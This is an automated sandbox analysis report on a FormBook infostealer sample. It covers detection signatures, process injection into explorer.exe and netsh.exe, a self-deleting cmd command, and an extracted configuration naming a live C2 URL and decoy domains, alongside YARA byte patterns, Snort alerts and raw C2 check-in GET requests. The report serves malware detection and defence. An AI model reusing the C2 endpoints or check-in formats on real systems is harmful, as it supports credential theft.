Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8tvMmyxveyzFcnJ.exe

Overview

General Information

Sample name:8tvMmyxveyzFcnJ.exe
Analysis ID:1470721
MD5:fff69b0890fc5c9c754e17d06deb5216
SHA1:e3b4644bd7f114a830ec649edbed92a437a81673
SHA256:a8fe32e805d1e0a0a61e2763308b01be24656f9bd356a863b174ce61e32d9a7e
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8tvMmyxveyzFcnJ.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
    • 8tvMmyxveyzFcnJ.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
    • 8tvMmyxveyzFcnJ.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autofmt.exe (PID: 180 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
        • netsh.exe (PID: 396 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 5676 cmdline: /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sainikshiksha.com/mc10/"], "decoy": ["sttcorp.one", "jack88.lat", "owl-protect.com", "hnszrrn.com", "at89v2.com", "h147.top", "takle4creators.com", "fondsa.xyz", "mantenopolice.com", "shophansler.com", "dessertt.com", "thecollisionmagazine.com", "tatesfluffyfrenchies.com", "h1f2v.rest", "bluewandltd.com", "cuplaho2003.shop", "2thetcleaningservice.com", "yc85w.top", "natursache.shop", "allmyabilities.com", "sorteioagora.shop", "291van.fun", "bforeplay.com", "playcoy99.com", "grapplegrid.app", "machaiproductions.com", "bjcysadz.xyz", "hg44a.com", "english4u.online", "w15hh.rest", "kurainu.xyz", "psycrowolgy.com", "quantron.xyz", "realtors.biz", "hjjhggh.top", "767jogo.com", "inspirationandhumor.com", "basedawgz.live", "jigofort.com", "bonjourmignon.com", "huttonsidel.online", "iffacosmetics.com", "483yes.com", "motolimod.com", "xatapartners.com", "laurelhw.com", "sztopsports.com", "ethermail-register.com", "ust-online.com", "theofficescowork.com", "arkonwheels.com", "projectorvibe.com", "xpanas.black", "gemaroke2.shop", "sofiastory.store", "dealerxai.com", "zerolength.xyz", "marketmaventesfayellc.site", "instrumentsurvey-dinarjatim.com", "ajansyapai.net", "llngx.com", "onwardgrowth.com", "useprize.com", "zaki-argan.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:07/10/24-12:11:01.020125
          SID:2031412
          Source Port:50630
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/10/24-12:13:25.925017
          SID:2031412
          Source Port:50634
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/10/24-12:11:21.261447
          SID:2031412
          Source Port:50631
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/10/24-12:11:42.251746
          SID:2031412
          Source Port:50632
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/10/24-12:10:40.094311
          SID:2031412
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/10/24-12:12:01.865030
          SID:2031412
          Source Port:50633
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.tatesfluffyfrenchies.com/mc10/Avira URL Cloud: Label: phishing
          Source: http://www.shophansler.com/mc10/:Avira URL Cloud: Label: phishing
          Source: http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.comAvira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sainikshiksha.com/mc10/"], "decoy": ["sttcorp.one", "jack88.lat", "owl-protect.com", "hnszrrn.com", "at89v2.com", "h147.top", "takle4creators.com", "fondsa.xyz", "mantenopolice.com", "shophansler.com", "dessertt.com", "thecollisionmagazine.com", "tatesfluffyfrenchies.com", "h1f2v.rest", "bluewandltd.com", "cuplaho2003.shop", "2thetcleaningservice.com", "yc85w.top", "natursache.shop", "allmyabilities.com", "sorteioagora.shop", "291van.fun", "bforeplay.com", "playcoy99.com", "grapplegrid.app", "machaiproductions.com", "bjcysadz.xyz", "hg44a.com", "english4u.online", "w15hh.rest", "kurainu.xyz", "psycrowolgy.com", "quantron.xyz", "realtors.biz", "hjjhggh.top", "767jogo.com", "inspirationandhumor.com", "basedawgz.live", "jigofort.com", "bonjourmignon.com", "huttonsidel.online", "iffacosmetics.com", "483yes.com", "motolimod.com", "xatapartners.com", "laurelhw.com", "sztopsports.com", "ethermail-register.com", "ust-online.com", "theofficescowork.com", "arkonwheels.com", "projectorvibe.com", "xpanas.black", "gemaroke2.shop", "sofiastory.store", "dealerxai.com", "zerolength.xyz", "marketmaventesfayellc.site", "instrumentsurvey-dinarjatim.com", "ajansyapai.net", "llngx.com", "onwardgrowth.com", "useprize.com", "zaki-argan.com"]}
          Multi AV Scanner detection for submitted file
          Source: 8tvMmyxveyzFcnJ.exeReversingLabs: Detection: 52%
          Source: 8tvMmyxveyzFcnJ.exeVirustotal: Detection: 49%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: 8tvMmyxveyzFcnJ.exeJoe Sandbox ML: detected
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netsh.pdb source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8tvMmyxveyzFcnJ.exe, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AYIS.pdb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: |.pDb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: AYIS.pdbSHA256M source: 8tvMmyxveyzFcnJ.exe
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 4x nop then pop edi3_2_00416CDF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi6_2_00416CDF

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50630 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50631 -> 103.224.212.213:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50632 -> 103.191.209.34:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50633 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50634 -> 198.185.159.144:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.sainikshiksha.com/mc10/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.fondsa.xyz
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh HTTP/1.1Host: www.291van.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh HTTP/1.1Host: www.motolimod.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh HTTP/1.1Host: www.at89v2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.213 103.224.212.213
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.64.163.50
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88DF82 getaddrinfo,setsockopt,recv,4_2_0F88DF82
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh HTTP/1.1Host: www.291van.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh HTTP/1.1Host: www.motolimod.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh HTTP/1.1Host: www.at89v2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.basedawgz.live
          Source: global trafficDNS traffic detected: DNS query: www.thecollisionmagazine.com
          Source: global trafficDNS traffic detected: DNS query: www.291van.fun
          Source: global trafficDNS traffic detected: DNS query: www.motolimod.com
          Source: global trafficDNS traffic detected: DNS query: www.at89v2.com
          Source: global trafficDNS traffic detected: DNS query: www.sainikshiksha.com
          Source: global trafficDNS traffic detected: DNS query: www.fondsa.xyz
          Source: global trafficDNS traffic detected: DNS query: www.huttonsidel.online
          Source: global trafficDNS traffic detected: DNS query: www.llngx.com
          Source: global trafficDNS traffic detected: DNS query: www.ajansyapai.net
          Source: global trafficDNS traffic detected: DNS query: www.tatesfluffyfrenchies.com
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000004.00000000.1706494215.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704923328.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704462653.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.291van.fun
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.291van.fun/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.291van.fun/mc10/www.motolimod.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.291van.funReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajansyapai.net
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajansyapai.net/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.com
